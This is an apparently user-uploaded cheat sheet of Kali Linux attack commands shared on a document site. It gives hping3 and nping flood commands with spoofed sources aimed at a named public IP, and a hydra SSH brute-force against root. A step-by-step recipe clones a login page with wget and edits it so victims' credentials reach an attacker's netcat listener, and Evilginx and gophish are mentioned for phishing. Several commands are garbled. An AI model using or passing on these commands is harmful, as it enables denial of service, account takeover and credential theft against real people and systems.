0% found this document useful (0 votes)
11 views

Kali Commands

kali

Uploaded by

01.akki.1999
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
11 views

Kali Commands

kali

Uploaded by

01.akki.1999
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 2

Information gathering websites

1. Whois.com
2. Sudo –sS ip address [for infor In a stealth way]
3. Dmitry –w website URL[for basic info of a website]
4. Dmitry –n website url [for get netcraft information]
5. Dmitry –e website url [for getting all the email address of a website]

DOS and DDOS


1. Hping3 -S –P –U –flood –V –rand-source35.157.193.7
2. Sudo hping3 -c 10000 –d 120 -S –w 64 –p 21 –flood –rand-source 35.157.193.7
3. [advanced dos attack]
4. sudo nping –tcp-connect –rate -90000 –c 90000 –q 35.157.193.7[targeted host id]

Password Hacking

1. crunch 2 3 qwe123[ generate password list]


2. cewl –d{depth of} 2 –m{minimum word length} 5 -w passwordhack.txt
https://example.com[it will create a list of passwords]
3. pw-inspector-i /usr/share/wordlists/nmap.lst –o docwords.txt -m 5 –M 10
4. wc -l /usr/share/wordlist/nmap.lst
5. sudo wc –l docwords.txt

Brute force
1. hydra –l root /usr/share/wordlists/metasploit/unix_passwords.txt –t 6 ssh://192.168.1.123

Phishing Techniques
1. gophish interface [know every thing about this ]

site cloning

 --mirror - applies a number of options to make the download recursive.


 --no-parent – Do not crawl the parent directory in order to get a portion of
the site only.
 --convert-links - makes all the links to work properly with the offline
copy.
 - download JS and CSS files to retain the original page
--page-requisites
style when browsing a local mirror.
 --adjust-extension - adds the appropriate extensions (e.g. html, css, js) to
files if they were retrieved without them.

If it shows an error then download windows recent or new user

 Got to google chrome latest user agent and In kali type wget --mirror --convert-
links --adjust-extension --page-requisites --no-parent
https://targeted site/identity/login –user-agent “Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/120.0.0.0 Safari/537.36”
 Is then enter
 Cd website name/ then enter
 Is then enter
 Python –m http.server
 Inspect the original page and change the landing page instead of original website
 Is enter
 Cd identity/
 Is
 Nano login.html{ modify here that login credentials will be send to our local ip address
 In kali nc –lvvnp 8081
 Cd..
 Pyhon –m http.server

Man in the middle

Evilginx

For phising gophising

Youtube Gemini security channel for this typeof knowledge

You might also like